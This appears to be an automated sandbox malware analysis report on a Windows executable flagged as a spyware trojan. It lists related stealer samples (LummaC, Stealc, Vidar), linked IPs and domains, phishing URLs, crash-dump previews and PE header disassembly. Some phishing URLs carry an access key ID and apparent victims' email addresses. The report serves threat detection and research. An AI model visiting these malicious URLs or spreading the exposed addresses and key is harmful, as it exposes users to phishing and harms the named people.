                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                        Number of analysed new started processes analysed:11
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Sample name:LP4a6BowQN.exe
                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                        Original Sample Name:80429ec2b7c1a75bc06b68846eb8be34.exe
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 4.245.163.56, 20.190.181.4, 4.175.87.197
                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                        • Execution Graph export aborted for target LP4a6BowQN.exe, PID 7624 because there are no executed function
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        02:19:03API Interceptor49x Sleep call for process: LP4a6BowQN.exe modified
                                                                                                                                                        04:18:13API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • jasonj002.bitbucket.io/
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        s3-w.us-east-1.amazonaws.comzLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.67.100
                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.18.140
                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.203.57
                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 3.5.16.86
                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 16.182.37.145
                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.216.41.233
                                                                                                                                                        https://cv01zl.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=bBChlGCf3qnCt%2B4WchKJjXtb09k%3D&Expires=1734874865#stewart.thomas@cambridgeshire.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                        • 52.217.128.241
                                                                                                                                                        https://ho8d1o.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAWPPO57XS4BTHJAEO&Signature=h4n%2BY6bT0YHF44DbJkmJeHwDnn0%3D&Expires=1734860434#mandy.pullen@peterborough.gov.ukGet hashmaliciousFake CaptchaBrowse
                                                                                                                                                        • 52.216.142.68
                                                                                                                                                        https://preview.micrasoft-office365.com/f5c275dd184cbe62?l=6Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 54.231.135.57
                                                                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                        • 54.231.224.185
                                                                                                                                                        cuddlyready.xyz0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 172.67.150.173
                                                                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 193.143.1.9
                                                                                                                                                        bitbucket.orgzLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.50
                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        CLOUDFLARENETUS0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 172.67.150.173
                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.36.201
                                                                                                                                                        0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 172.67.199.72
                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.36.201
                                                                                                                                                        NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 172.67.199.72
                                                                                                                                                        U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 172.67.199.72
                                                                                                                                                        ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 104.21.36.201
                                                                                                                                                        skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.36.201
                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.157.254
                                                                                                                                                        pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.157.254
                                                                                                                                                        AMAZON-02USzLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.67.100
                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.18.140
                                                                                                                                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 54.203.164.5
                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 52.217.203.57
                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 185.166.143.48
                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 54.171.230.55
                                                                                                                                                        trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                        • 108.139.47.92
                                                                                                                                                        https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLwGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 65.9.112.70
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e10OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        skIYOAOzvU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 16.182.101.249
                                                                                                                                                        • 185.166.143.49
                                                                                                                                                        • 104.21.32.96
                                                                                                                                                        No context
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):1.0455895091566931
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:e6T5e3ol0BU/HzUjudxhYfzuiFuZ24IO8EyA:g37BU/AjjzuiFuY4IO8S
                                                                                                                                                        MD5:61CE78251C0C33A253C63FA58EEA9613
                                                                                                                                                        SHA1:E20D77E5B29229D0E1B325E12D8E2E35413D4D4C
                                                                                                                                                        SHA-256:77E48ABD31312C92ADA16F4B67DEB9132D9E4FF5D01986D45E02EBFC53BF77E6
                                                                                                                                                        SHA-512:6B0480AFD78E7814552AB09245F44652219FB9A46F3F89659891106DC5C90E274DB0EDD4CF78A3D4FAAB8908EAB75CAF4B5842787893732D7F7DFAF68D79AB3D
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.9.0.6.2.3.9.7.6.8.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.9.0.6.2.9.1.3.2.9.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.4.a.f.1.e.2.-.e.6.f.4.-.4.7.f.b.-.a.3.a.f.-.0.b.b.b.3.b.f.f.3.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.0.8.9.9.f.0.-.d.d.6.8.-.4.1.d.9.-.b.e.5.1.-.d.0.3.e.4.6.8.7.d.9.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.P.4.a.6.B.o.w.Q.N...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.c.8.-.0.0.0.1.-.0.0.1.4.-.1.5.5.f.-.c.b.e.f.0.a.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.3.e.d.0.6.c.6.b.f.c.b.b.b.9.a.b.5.5.6.f.e.f.c.7.9.5.b.1.2.f.0.0.0.0.f.f.f.f.!.0.0.0.0.b.5.8.d.0.a.c.b.e.f.2.a.f.5.3.e.2.d.5.0.7.c.f.d.4.f.b.3.c.0.7.e.a.5.d.6.a.9.1.e.!.L.P.4.a.6.B.o.w.Q.N...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 09:17:42 2024, 0x1205a4 type
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):285762
                                                                                                                                                        Entropy (8bit):1.4909368944017303
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:1FcnmWFltY6eoPhxrBk5J57H+6qzEqs7aA:ncmIltY6eoPhxOja6qIpD
                                                                                                                                                        MD5:0A1DD15304850A5EFFDA28F11B4B535A
                                                                                                                                                        SHA1:E54A477659EA83601A17FF8982D0B15D1A6341EA
                                                                                                                                                        SHA-256:053982B7F7A5149CBEB68B285C097F95C74217B8B6BE4D018DBBD8695F69A230
                                                                                                                                                        SHA-512:969A7D4D127A3FA83F9F0523D188E4FF8D1B8641E6C9668D005DEBB7F3386704E58D5A339770F98237883B509D60C114AF78C64326B75C03E2566481D225F85D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:MDMP..a..... ........*ig....................................D....'..........L...........`.......8...........T............L..B............(...........*..............................................................................eJ......`+......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):8390
                                                                                                                                                        Entropy (8bit):3.7019458930761537
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:R6l7wVeJeDQ6CQ6YN4SUF8MtgmfCx5pr089b91sf5v/m:R6lXJr6t6YSSUiWgmfY19Of0
                                                                                                                                                        MD5:B28D325812B69134A536863B44E1D1A7
                                                                                                                                                        SHA1:9B177F2CA6145FB9969E3F3E2D9A7353BDBB64E1
                                                                                                                                                        SHA-256:40B5B4E9C44D249181EBBFF8A816DE741A598A0AE154A8298EE129404489F20B
                                                                                                                                                        SHA-512:C788A1B1E8D67BFE90DA954A32C7861FC5E4FA28234422A5E57F5D86E95D77B881535D16CB0C80EC53D4671F5B8761CC2C38C4340234260F4FD49C23A6A99ECD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.2.4.<./.P.i.
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4624
                                                                                                                                                        Entropy (8bit):4.507311376001826
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:cvIwWl8zsnviJg77aI9NCWpW8VYJXYm8M4JtKxFP6+q826kQHPzACsd:uIjfnvwI7PD7VxJc6jqPzACsd
                                                                                                                                                        MD5:FB9631A0B54AB2078EB1A4C3EC0BC92D
                                                                                                                                                        SHA1:4694F9D3DB61F76C91BA769AC710876D7D39444A
                                                                                                                                                        SHA-256:6919A624F9BF1BB07C274488EA472F7A04A0B0093E14BD0BC0192B6F7D250ABF
                                                                                                                                                        SHA-512:276D75B7C35D2A6775B40E19D4D9974FD8895063F5A0EFFB4A3A64C6FEA3D5F398DF46945891E30B34CD39C4C4011D1078F5925476D320CB80808402AC247A36
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643700" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                        Entropy (8bit):4.416676553356215
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Ucifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNI5+:5i58oSWIZBk2MM6AFBGo
                                                                                                                                                        MD5:F792E8390887283205080E8B5431A764
                                                                                                                                                        SHA1:58BBE35AD84A66B21CEAE15AA6B563181D7BC7FB
                                                                                                                                                        SHA-256:82C8935FE0BC808A2E93FEFC409750645E80920FEB2B6238261EA538BA2D8DCC
                                                                                                                                                        SHA-512:3290EFD423A50C0497734FE95709B683C9BC18213AF72CEE66A4A22BFB015B364216F58F8E0EB762723985EB94E7769528309D01E8B2B8F1B6F061C28878FDF2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Y...U..............................................................................................................................................................................................................................................................................................................................................K...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Entropy (8bit):6.53396009093084
                                                                                                                                                        TrID:
                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                        File name:LP4a6BowQN.exe
                                                                                                                                                        File size:2'969'088 bytes
                                                                                                                                                        MD5:80429ec2b7c1a75bc06b68846eb8be34
                                                                                                                                                        SHA1:b58d0acbef2af53e2d507cfd4fb3c07ea5d6a91e
                                                                                                                                                        SHA256:20255112ad07c22d1d56b35fb01dbf5592bd679dd8903d66bfe871badae4b0f2
                                                                                                                                                        SHA512:4eec8f86baf15ea8a50c8675afed272309cd2b5bf5f96523093ac73db9f5beb9db0f28b884ba39a18d6e969c621f1eba31f52ad368c5b3c02be2694739942ba7
                                                                                                                                                        SSDEEP:24576:7M/xBerHHvpMlOe1o1h+RfI0GKDfeMt7pGdQgBzN4x3ZzduC8CEoDKCxyKDtbX0E:7uBoHxOODuYMtngdTYbX0CF62b+ICcr
                                                                                                                                                        TLSH:09D55B91BC0572CFD08E1678971BCE42A85E47F64B2158D3EC6CA1BA7DB7CC116BAC24
                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. 0...........@..........................P0.......-...@.................................T0..h..
                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                        Entrypoint:0x702000
                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                        Digitally signed:false
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                        TLS Callbacks:
                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                        OS Version Major:6
                                                                                                                                                        OS Version Minor:0
                                                                                                                                                        File Version Major:6
                                                                                                                                                        File Version Minor:0
                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                        Instruction
                                                                                                                                                        jmp 00007FC8BCB99FAAh
                                                                                                                                                        cvttps2pi mm5, qword ptr [00000000h]
                                                                                                                                                        add cl, ch
                                                                                                                                                        add byte ptr [eax], ah
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax+00h], ah
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        inc esp
                                                                                                                                                        nop
                                                                                                                                                        iretd
                                                                                                                                                        cmp eax, dword ptr [eax]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add dword ptr [eax], eax
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                        add byte ptr [edx], cl
                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax+eax*4], cl
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add ecx, dword ptr [edx]
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
